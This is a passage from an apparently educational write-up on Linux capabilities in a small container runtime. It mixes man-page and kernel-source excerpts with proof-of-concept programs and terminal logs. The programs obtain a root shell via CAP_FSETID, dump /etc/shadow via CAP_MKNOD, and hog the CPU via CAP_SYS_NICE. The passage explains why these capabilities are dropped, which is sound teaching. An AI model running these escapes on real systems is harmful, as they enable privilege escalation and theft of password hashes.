	transformations described  above have been  performed.  (The
	typical  reason  why  this  might  not  occur  is  that  the
	capability bounding set masked  out some of the capabilities
	in the file  permitted set.)  If the process  did not obtain
	the full set of  file permitted capabilities, then execve(2)
	fails with the error EPERM.  This prevents possible security
	risks that could arise when a capability-dumb application is
	executed with less  privilege that it needs.   Note that, by
	definition, the application could  not itself recognize this
	problem, since it does not employ the libcap(3) API.

kernel/audit.c:663@c8d2bc

switch (msg_type) {
case AUDIT_LIST:
case AUDIT_ADD:
case AUDIT_DEL:
	return -EOPNOTSUPP;
case AUDIT_GET:
case AUDIT_SET:
case AUDIT_GET_FEATURE:
case AUDIT_SET_FEATURE:
case AUDIT_LIST_RULES:
case AUDIT_ADD_RULE:
case AUDIT_DEL_RULE:
case AUDIT_SIGNAL_INFO:
case AUDIT_TTY_GET:
case AUDIT_TTY_SET:
case AUDIT_TRIM:
case AUDIT_MAKE_EQUIV:
	/* Only support auditd and auditctl in initial pid namespace
	 * for now. */
	if (task_active_pid_ns(current) != &init_pid_ns)
		return -EPERM;

	if (!netlink_capable(skb, CAP_AUDIT_CONTROL))
		err = -EPERM;
	break;
case AUDIT_USER:
case AUDIT_FIRST_USER_MSG ... AUDIT_LAST_USER_MSG:
case AUDIT_FIRST_USER_MSG2 ... AUDIT_LAST_USER_MSG2:
	if (!netlink_capable(skb, CAP_AUDIT_WRITE))
		err = -EPERM;
	break;
default:  /* bad msg */
	err = -EINVAL;
}

您可以通过调用

socket(AF_NETLINK, SOCK_DGRAM, NETLINK_AUDIT)

man 7 netlink

NETLINK(7) -- 2016-07-17 -- Linux -- Linux Programmer's Manual

NAME
	netlink  -  communication  between  kernel  and  user  space
	(AF_NETLINK)
SYNOPSIS
	[...]
	netlink_socket = socket(AF_NETLINK, socket_type, netlink_family);
	[...]
DESCRIPTION
	Netlink is  used to transfer information  between the kernel
	and  user-space  processes.   It   consists  of  a  standard
	sockets-based  interface for  user  space  processes and  an
	internal kernel API for kernel modules.
	[...]
	netlink_family selects the kernel module or netlink group to
	communicate with.   The currently assigned  netlink families
	are:
	[...]
	NETLINK_AUDIT (since Linux 2.6.6)
		Auditing.

man 7 capabilities

	CAP_BLOCK_SUSPEND (since Linux 3.5)
		Employ features that can block system suspend (epoll(7)
		EPOLLWAKEUP, /proc/sys/wake_lock).

塞巴斯蒂安·克拉默（Sebastian Krahmer）的电子邮件和描述

在 0.11 中，问题在于在容器中运行的应用程序具有 CAP_DAC_READ_SEARCH和CAP_DAC_OVERRIDE，允许集装箱应用程序不仅可以通过路径名访问文件（这是不可能的由于 rootfs 的绑定挂载），但也通过句柄通过 open_by_handle_at（）。句柄大多是 64 位值，可以是 kind 的预先计算，因为它们是基于 inode 的，并且 / 的 inode 为 2。所以您可以继续走路/通过传递 2 的句柄并搜索 FS 直到找到要访问的文件的 inode#。即使您被容器化在 /var/lib 中的某个位置。

链接到代码 shocker.c。

请注意，如果用户名空间处于打开状态，则我们不容易受到攻击，因为在根命名空间中检查：open_by_handle_at``CAP_DAC_READ_SEARCH

[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GSmTxw...done.
=> trying a user namespace...writing /proc/1538/uid_map...writing /proc/1538/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.
fs/fhandle.c:166
static int handle_to_path(int mountdirfd, struct file_handle __user *ufh,
		   struct path *path)
{
	int retval = 0;
	struct file_handle f_handle;
	struct file_handle *handle = NULL;

	/*
	 * With handle we don't look at the execute bit on the
	 * the directory. Ideally we would like CAP_DAC_SEARCH.
	 * But we don't have that
	 */
	if (!capable(CAP_DAC_READ_SEARCH)) {
		retval = -EPERM;
		goto out_err;
	}
	/* ... */
}

The setuid executable we’ll subvert:

harmless_setuid.c
/* -*- compile-command: "gcc -Wall -Werror harmless_setuid.c -o harmless_setuid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	uid_t a, b, c = 0;
	getresuid(&a, &b, &c);
	printf("I'm #%d/%d/%d\n", a, b, c);
	return 0;
}

This program will write itself to the executable at . If it’s a setuid root executable, there’s no user namespace, and isn’t dropped, it’ll retain setuid root. argv[1]``CAP_FSETID

cap_fsetid.c
/* -*- compile-command: "gcc -Wall -Werror -static cap_fsetid.c -o cap_fsetid" -*- */
#define _GNU_SOURCE
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	if (argc == 2) {
		/* write our contents to the setuid file. */
		int setuid_file = 0;
		int own_file = 0;
		if ((setuid_file = open(argv[1], O_WRONLY | O_TRUNC)) == -1
		    || (own_file = open(argv[0], O_RDONLY)) == -1) {
			fprintf(stderr, "++ open failed: %m\n");
			return 1;
		}
		errno = 0;
		char here = 0;
		while (read(own_file, &here, 1) > 0
		       && write(setuid_file, &here, 1) > 0);;
		if (errno) {
			fprintf(stderr, "++ reading/writing: %m\n");
			close(setuid_file);
			close(own_file);
		}
		close(own_file);
		close(setuid_file);
	} else {
		if (setresuid(0, 0, 0)) {
			fprintf(stderr, "++ failed switching uids to root: %m\n");
			return 1;
		}
		execve("/bin/sh", (char *[]) { "sh", 0 }, NULL);
	}
	return 0;
}
allow_capfsetid.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..17e7373 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -34,7 +34,6 @@ int capabilities()
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
 		CAP_DAC_READ_SEARCH,
-		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
I'm #1000/0/0
[lizzie@empress l-c-i-500-l]$ sudo ./contained -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.qapCVs...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid 
++ failed switching uids to root: Operation not permitted
[lizzie@empress l-c-i-500-l]$ make -B harmless_setuid
cc -Wall -Werror -static harmless_setuid.c -o harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chown root harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo chmod 4755 harmless_setuid
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capfsetid -m . -u 0 -c ./cap_fsetid harmless_setuid
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.4u1dNe...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ ls -lh ./harmless_setuid
-rwsr-xr-x 1 root lizzie 788K Oct 25 05:22 ./harmless_setuid
[lizzie@empress l-c-i-500-l]$ ./harmless_setuid
sh-4.3# whoami
root
sh-4.3# id
uid=0(root) gid=1000(lizzie) groups=1000(lizzie)
sh-4.3# exit
[lizzie@empress l-c-i-500-l]$ rm harmless_setuid

man 2 mlock

DESCRIPTION
	mlock(), mlock2(),  and mlockall() lock  part or all  of the
	calling process's virtual address space into RAM, preventing
	that memory from being paged to the swap area.

	munlock() and  munlockall() perform the  converse operation,
	unlocking  part  or all  of  the  calling process's  virtual
	address  space,  so  that  pages in  the  specified  virtual
	address range may once more to be swapped out if required by
	the kernel memory manager.

	Memory locking and unlocking are performed in units of whole
	pages.

ERRORS

	ENOMEM
		(Linux  2.6.9  and  later)  the caller  had  a  nonzero
		RLIMIT_MEMLOCK soft  resource limit, but tried  to lock
		more memory  than the  limit permitted.  This  limit is
		not   enforced    if   the   process    is   privileged
		(CAP_IPC_LOCK).

These functions are the only use of ; the only mention in the source is CAP_IPC_LOCK

mm/mlock.c:27@c8d2bc

bool can_do_mlock(void)
{
	if (rlimit(RLIMIT_MEMLOCK) != 0)
		return true;
	if (capable(CAP_IPC_LOCK))
		return true;
	return false;
}

cap_mknod.c
/* -*- compile-command: "gcc -Wall -Werror -static cap_mknod.c -o cap_mknod" -*- */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>
#define DEV "/disk"
#define MNT "/mnt"

int main (int argc, char **argv)
{
	if (argc != 4) return 1;
	int return_code = 0;
	int etc_shadow = 0;
	
	dev_t dev = makedev(atoi(argv[1]), atoi(argv[2]));
	if (mknod(DEV, S_IFBLK | S_IRUSR, dev)) {
		fprintf(stderr, "++ mknod failed: %m\n");
		return 1;
	}
	if (mkdir(MNT, S_IRUSR)
	    && (errno != EEXIST)) {
		fprintf(stderr, "++ mkdir failed: %m\n");
		goto cleanup_error;
	}
	if (mount(DEV, MNT, argv[3], 0, NULL)) {
		fprintf(stderr, "++ mount failed: %m\n");
		goto cleanup_error;
	}
	if ((etc_shadow = open(MNT "/etc/shadow", O_RDONLY)) == -1) {
		fprintf(stderr, "++ opening /etc/shadow failed: %m\n");
		goto cleanup_error;
	}
	fprintf(stderr, "++ reading /etc/shadow:\n");
	char here = 0;
	errno = 0;
	while (read(etc_shadow, &here, 1) > 0)
		write(STDOUT_FILENO, &here, 1);
	if (errno) {
		fprintf(stderr, "read loop failed! %m\n");
		goto cleanup_error;
	}
	goto cleanup;
cleanup_error:
	return_code = 1;
cleanup:
	if (etc_shadow) close(etc_shadow);
	umount(MNT);
	unlink(DEV);
	rmdir(MNT);
	return return_code;
}
allow_capmknod.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..985930e 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,10 +38,8 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
 		CAP_SETFCAP,
 		CAP_SYSLOG,
-		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
 		CAP_SYS_NICE,

Note that doesn’t need to be allowed for this to work, it’s just that is more convenient than reading the block device in userspace. CAP_SYS_ADMIN``mount

[lizzie@empress l-c-i-500-l]$  sudo  ./contained -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.VTnW1G...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ mknod failed: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ make contained.allow_capmknod
patch contained.c -i allow_capmknod.diff -o contained.allow_capmknod.c
patching file contained.allow_capmknod.c (read from contained.c)
Hunk #1 succeeded at 46 (offset 8 lines).
cc -Wall -Werror -lseccomp -lcap contained.allow_capmknod.c -o contained.allow_capmknod
rm contained.allow_capmknod.c
[lizzie@empress l-c-i-500-l]$  sudo  ./contained.allow_capmknod -m . -u 0 -c cap_mknod 8 1 vfat
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.fdbi8q...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ reading /etc/shadow:
[redacted]
=> cleaning cgroups...done.

setfcap_and_exec.c
/* -*- compile-command: "gcc -Wall -Werror setfcap_and_exec.c -o setfcap_and_exec  -static -lcap" -*- */
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <linux/capability.h>
#include <sys/capability.h>
#include <sys/prctl.h>
#include <sys/types.h>

int main (int argc, char  **argv)
{
	if (argc == 2 && !strcmp(argv[1], "inner")) {
		cap_t self_caps = {0};
		if (!(self_caps = cap_get_proc())) {
			fprintf(stderr, "++ cap_get_proc failed: %m\n");
			return 1;
		}

		cap_flag_value_t cap_mknod_status = CAP_CLEAR;
		if (cap_get_flag(self_caps, CAP_MKNOD, CAP_PERMITTED, &cap_mknod_status)) {
			fprintf(stderr, "++ cap_get_flag failed: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_mknod_status == CAP_CLEAR)
			fprintf(stderr, "!! don't have cap_mknod+p?\n");

		if (cap_set_flag(self_caps, CAP_EFFECTIVE, 1,
				 & (cap_value_t) { CAP_MKNOD }, CAP_SET)) {
			fprintf(stderr, "++ can't cap_set_flag: %m\n");
			cap_free(self_caps);
			return 1;
		}
		if (cap_set_proc(self_caps)) {
			fprintf(stderr, "++ can't cap_set_proc: %m\n");
			cap_free(self_caps);
			return 1;
		}
		cap_free(self_caps);
		fprintf(stderr, "++ have CAP_MKNOD!\n");
	} else {
		cap_t file_caps = {0};
		if (!(file_caps = cap_from_text("cap_mknod+p"))) {
			fprintf(stderr, "++ cap_from_text failed: %m\n");
			return 1;
		}
		if (cap_set_file(argv[0], file_caps)) {
			fprintf(stderr, "++ cap_set_file failed: %m\n");
			cap_free(file_caps);
			return 1;
		}
		cap_free(file_caps);

		if (execve(argv[0], (char  *[]){ argv[0], "inner", 0 }, NULL)) {
			fprintf(stderr, "++ execve failed: %m\n");
			return 1;
		}
	}
	return 0;
}
allow_capsetfcap.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..0f3a4e2 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -39,7 +39,6 @@ int capabilities()
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
 		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.GCu2Ry...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
!! don't have cap_mknod+p?
++ can't cap_set_proc: Operation not permitted
=> cleaning cgroups...done.

it does work if we don’t restrict , so it does seem like processes aren’t allowed to set capabilities on files that they don’t have: CAP_MKNOD

allow_capmknod_capsetfcap.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..b458201 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -38,8 +38,6 @@ int capabilities()
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
 		CAP_MAC_OVERRIDE,
-		CAP_MKNOD,
-		CAP_SETFCAP,
 		CAP_SYSLOG,
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capmknod_capsetfcap -m . -u 0 -c setfcap_and_exec
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.IZ1gDw...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
++ have CAP_MKNOD!
=> cleaning cgroups...done.

This disagrees with Brad Spengler’s note in False Boundaries and Arbitrary Code Execution

CAP_SETFCAP: generic: can set full capabilities on a file, granting full capabilities upon exec

but that’s 5 years old, so it may have changed.

man 7 capabilities

	CAP_SYSLOG (since Linux 2.6.37)
		*  Perform   privileged   syslog(2)  operations.    See
		   syslog(2)  for   information  on   which  operations
		   require privilege.
		*  View kernel  addresses exposed  via /proc  and other
		   interfaces  when /proc/sys/kernel/kptr_restrict  has
		   the   value  1.    (See   the   discussion  of   the
		   kptr_restrict in proc(5).)

man 2 syslog

	SYSLOG_ACTION_READ (2)
		[...] Bytes read from the log disappear from the log
		buffer [...]

	SYSLOG_ACTION_READ_ALL (3)
		[...] The call reads the   last    len   bytes    from
		the    log   buffer (nondestructively) [...]

	SYSLOG_ACTION_READ_CLEAR (4) [...]

	SYSLOG_ACTION_CLEAR (5) [...]

	SYSLOG_ACTION_CONSOLE_OFF (6) [...]

	SYSLOG_ACTION_CONSOLE_ON (7) [...]

	SYSLOG_ACTION_CONSOLE_LEVEL (8) [...]

	SYSLOG_ACTION_SIZE_UNREAD (9) [...]

	SYSLOG_ACTION_SIZE_BUFFER (10) [...]

	All commands  except 3 and  10 require privilege.

All of the uses of : CAP_SYS_BOOT

kernel/reboot.c:280@c8d2bc:

SYSCALL_DEFINE4(reboot, int, magic1, int, magic2, unsigned int, cmd,
		void __user *, arg)
{
	struct pid_namespace *pid_ns = task_active_pid_ns(current);
	char buffer[256];
	int ret = 0;

	/* We only trust the superuser with rebooting the system. */
	if (!ns_capable(pid_ns->user_ns, CAP_SYS_BOOT))
		return -EPERM;

	[...]
}

kernel/kexec.c:187@c8d2bc:

SYSCALL_DEFINE4(kexec_load, unsigned long, entry, unsigned long, nr_segments,
		struct kexec_segment __user *, segments, unsigned long, flags)
{
	int result;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;

	[...]
}

kernel/kexec_file.c:256@c8d2bc:

SYSCALL_DEFINE5(kexec_file_load, int, kernel_fd, int, initrd_fd,
		unsigned long, cmdline_len, const char __user *, cmdline_ptr,
		unsigned long, flags)
{
	int ret = 0, i;
	struct kimage **dest_image, *image;

	/* We only trust the superuser with rebooting the system. */
	if (!capable(CAP_SYS_BOOT) || kexec_load_disabled)
		return -EPERM;
	[...]
}

kernel/module.c:931@c8d2bc

SYSCALL_DEFINE2(delete_module, const char __user *, name_user,
		unsigned int, flags)
{
	struct module *mod;
	char name[MODULE_NAME_LEN];
	int ret, forced = 0;

	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;
	[...]
}

kernel/module.c:3468@c8d2bc

static int may_init_module(void)
{
	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;

	return 0;
}

which is called by and : init_module``finit_module

kernel/module.c:3759@c8d2bc

SYSCALL_DEFINE3(init_module, void __user *, umod,
		unsigned long, len, const char __user *, uargs)
{
	int err;
	struct load_info info = { };

	err = may_init_module();
	if (err)
		return err;

	pr_debug("init_module: umod=%p, len=%lu, uargs=%p\n",
	       umod, len, uargs);

	err = copy_module_from_user(umod, len, &info);
	if (err)
		return err;

	return load_module(&info, uargs, 0);
}

SYSCALL_DEFINE3(finit_module, int, fd, const char __user *, uargs, int, flags)
{
	struct load_info info = { };
	loff_t size;
	void *hdr;
	int err;

	err = may_init_module();
	if (err)
		return err;

	pr_debug("finit_module: fd=%d, uargs=%p, flags=%i\n", fd, uargs, flags);

	if (flags & ~(MODULE_INIT_IGNORE_MODVERSIONS
		      |MODULE_INIT_IGNORE_VERMAGIC))
		return -EINVAL;

	err = kernel_read_file_from_fd(fd, &hdr, &size, INT_MAX,
				       READING_MODULE);
	if (err)
		return err;
	info.hdr = hdr;
	info.len = size;

	return load_module(&info, uargs, flags);
}

kernel/kmod.c:630@c8d2bc

static int proc_cap_handler(struct ctl_table *table, int write,
			 void __user *buffer, size_t *lenp, loff_t *ppos)
{
	struct ctl_table t;
	unsigned long cap_array[_KERNEL_CAPABILITY_U32S];
	kernel_cap_t new_cap;
	int err, i;

	if (write && (!capable(CAP_SETPCAP) ||
		      !capable(CAP_SYS_MODULE)))
		return -EPERM;

	[...]
}

which is used to authorize requests to load modules.

net/core/dev_ioctl.c:349@c8d2bc

/**
 *	dev_load	- load a network module
 *	@net: the applicable net namespace
 *	@name: name of interface
 *
 *	If a network interface is not present and the process has suitable
 *	privileges this function loads the module. If module loading is not
 *	available in this kernel then it becomes a nop.
 */

void dev_load(struct net *net, const char *name)
{
	struct net_device *dev;
	int no_module;

	rcu_read_lock();
	dev = dev_get_by_name_rcu(net, name);
	rcu_read_unlock();

	no_module = !dev;
	if (no_module && capable(CAP_NET_ADMIN))
		no_module = request_module("netdev-%s", name);
	if (no_module && capable(CAP_SYS_MODULE))
		request_module("%s", name);
}

This also allows processes with only to load modules, and is run on almost every on a network device: CAP_NET_ADMIN``netdev-*``ioctl

net/core/dev_ioctl.c:381@c8d2bc

/**
 *	dev_ioctl	-	network device ioctl
 *	@net: the applicable net namespace
 *	@cmd: command to issue
 *	@arg: pointer to a struct ifreq in user space
 *
 *	Issue ioctl functions to devices. This is normally called by the
 *	user space syscall interfaces but can sometimes be useful for
 *	other purposes. The return value is the return from the syscall if
 *	positive or a negative errno code on error.
 */

int dev_ioctl(struct net *net, unsigned int cmd, void __user *arg)
{
	[...]
	/*
	 *	See which interface the caller is talking about.
	 */

	switch (cmd) {
	/*
	 *	These ioctl calls:
	 *	- can be done by all.
	 *	- atomic and do not require locking.
	 *	- return a value
	 */
	case SIOCGIFFLAGS:
	case SIOCGIFMETRIC:
	case SIOCGIFMTU:
	case SIOCGIFHWADDR:
	case SIOCGIFSLAVE:
	case SIOCGIFMAP:
	case SIOCGIFINDEX:
	case SIOCGIFTXQLEN:
		dev_load(net, ifr.ifr_name);
		[...]
}

This was pretty surprising to me! I should look into this further.

man 2 nice

DESCRIPTION
	nice() adds inc  to the nice value for  the calling process.
	(A  higher  nice value  means  a  low priority.)   Only  the
	superuser  may specify  a  negative  increment, or  priority
	increase.
	[...]

ERRORS

	EPERM
		The calling process attempted  to increase its priority
		by  supplying  a  negative  inc  but  has  insufficient
		privileges.  Under  Linux, the  CAP_SYS_NICE capability
		is   required.   (But   see  the   discussion  of   the
		RLIMIT_NICE resource limit in setrlimit(2).)

We’ll see how many CPU cycles this gets in a single-core virtual machine, in the host and in a container that can set low nice values:

busy_loop.c
/* -*- compile-command: "gcc -Wall -Werror -static busy_loop.c -o busy_loop" -*- */
#include <time.h>
#include <sys/times.h>
#include <stdio.h>

int main (int argc, char  **argv)
{
	struct timespec now = {0};
	struct timespec then = {0};
	clock_gettime(CLOCK_MONOTONIC, &then);
	do {
		clock_gettime(CLOCK_MONOTONIC, &now);
	} while ((now.tv_sec - then.tv_sec) * 5e9
		 + now.tv_nsec - then.tv_nsec < 20e9);
	/* how much cpu time did we get? */
	struct tms tms = {0};
	if (times(&tms) == -1) {
		fprintf(stderr, "++ times failed: %m\n");
		return 1;
	}
	/*  "The tms_utime field contains the CPU time spent executing
	    instructions of the calling process.  The tms_stime field contains the
	    CPU time spent in the system while executing tasks on behalf of the
	    calling process." */
	printf("ticks: %lu\n", tms.tms_utime + tms.tms_stime);
	return 0;
}
nice_dos.c
/* -*- compile-command: "gcc -Wall -Werror -static nice_dos.c -o nice_dos" -*- */
#include <unistd.h>
#include <stdio.h>

int main (int argc, char **argv)
{
	if (nice(-10) == -1) {
		fprintf(stderr, "++ nice failed: %m\n");
		return 1;
	}
	if (execve("./busy_loop", (char *[]) { "./busy_loop", 0 }, NULL)) {
		fprintf(stderr, "++ execve failed: %m\n");
		return 1;
	}
}
allow_capsysnice.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..4895071 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -44,7 +44,6 @@ int capabilities()
 		CAP_SYS_ADMIN,
 		CAP_SYS_BOOT,
 		CAP_SYS_MODULE,
-		CAP_SYS_NICE,
 		CAP_SYS_RAWIO,
 		CAP_SYS_RESOURCE,
 		CAP_SYS_TIME,
alpine-kernel-dev:~# (./busy_loop && echo '^ uncontained one' &) && (sudo ./contained.allow_capsysnice -m . -u 0 -c ./nice_dos &)
=> validating Linux version...4.7.6.
=> setting cgroups...memory...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.elKMci...done.
=> trying a user namespace...unsupported? continuing.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
ticks: 52
^ uncontained one
ticks: 341
=> cleaning cgroups...done.
alpine-kernel-dev:~#

man 7 capabilities

	CAP_SYS_RAWIO
		* Perform I/O port operations (iopl(2) and ioperm(2));
		* access /proc/kcore;
		* employ the FIBMAP ioctl(2) operation;
		* open   devices  for   accessing  x86   model-specific
		  registers (MSRs, see msr(4))
		* update /proc/sys/vm/mmap_min_addr;
		* create memory  mappings at addresses below  the value
		  specified by /proc/sys/vm/mmap_min_addr;
		* map files in /proc/bus/pci;
		* open /dev/mem and /dev/kmem;
		* perform various SCSI device commands;
		* perform  certain operations  on hpsa(4)  and cciss(4)
		  devices;
		* perform  a  range  of device-specific  operations  on
		  other devices.

man 4 mem

	/dev/mem is a character device file  that is an image of the
	main memory of  the computer.  It may be  used, for example,
	to examine (and even patch) the system.

	[...]

	It is typically created by:

		mknod -m 660 /dev/mem c 1 1
		chown root:kmem /dev/mem

	The file /dev/kmem is the  same as /dev/mem, except that the
	kernel  virtual  memory  rather   than  physical  memory  is
	accessed.  Since  Linux 2.6.26, this file  is available only
	if  the   CONFIG_DEVKMEM  kernel  configuration   option  is
	enabled.

	It is typically created by:

		mknod -m 640 /dev/kmem c 1 2
		chown root:kmem /dev/kmem

	/dev/port  is similar  to /dev/mem,  but the  I/O ports  are
	accessed.

	It is typically created by:

		mknod -m 660 /dev/port c 1 4
		chown root:kmem /dev/port

man 2 ioperm

	ioperm()  sets  the  port  access permission  bits  for  the
	calling thread for num bits starting from port address from.
	If  turn_on is  nonzero, then  permission for  the specified
	bits is  enabled; otherwise it  is disabled.  If  turn_on is
	nonzero,   the    calling   thread   must    be   privileged
	(CAP_SYS_RAWIO).

man 2 iopl

	iopl()  changes  the  I/O  privilege level  of  the  calling
	process, as specified  by the two least  significant bits in
	level.

	This call is necessary to allow 8514-compatible X servers to
	run under  Linux.  Since these  X servers require  access to
	all 65536 I/O ports, the ioperm(2) call is not sufficient.

	In  addition  to  granting  unrestricted  I/O  port  access,
	running  at a  higher I/O  privilege level  also allows  the
	process to disable interrupts.  This will probably crash the
	system, and is not recommended.

man 7 capabilities

	CAP_SYS_RESOURCE
		* Use reserved space on ext2 filesystems;
		* make ioctl(2) calls controlling ext3 journaling;
		* override disk quota limits;
		* increase resource limits (see setrlimit(2));
		* override RLIMIT_NPROC resource limit;
		* override  maximum  number   of  consoles  on  console
		  allocation;
		* override maximum number of keymaps;
		* allow more  than 64hz  interrupts from  the real-time
		  clock;
		* raise msg_qbytes  limit for a System  V message queue
		  above  the  limit   in  /proc/sys/kernel/msgmnb  (see
		  msgop(2) and msgctl(2));
		* override  the  /proc/sys/fs/pipe-size-max limit  when
		  setting the capacity of a pipe using the F_SETPIPE_SZ
		  fcntl(2) command.
		* use F_SETPIPE_SZ  to increase the capacity  of a pipe
		  above       the        limit       specified       by
		  /proc/sys/fs/pipe-max-size;
		* override  /proc/sys/fs/mqueue/queues_max  limit  when
		  creating POSIX message queues (see mq_overview(7));
		* employ prctl(2) PR_SET_MM operation;
		* set /proc/PID/oom_score_adj to a value lower than the
		  value last set by a process with CAP_SYS_RESOURCE.

Brad Spengler agreees in “False Boundaries and Arbitrary Code Execution”:

No transitions known (to this author, yet): […] CAP_SYS_RESOURCE […]

It turns out that you can break important things by altering the time. “Authenticated Network Time Synchronization” describes some of these:

The importance of accurate time for security. There are many examples of security mechanisms which (often implicitly) rely on having an accurate clock:

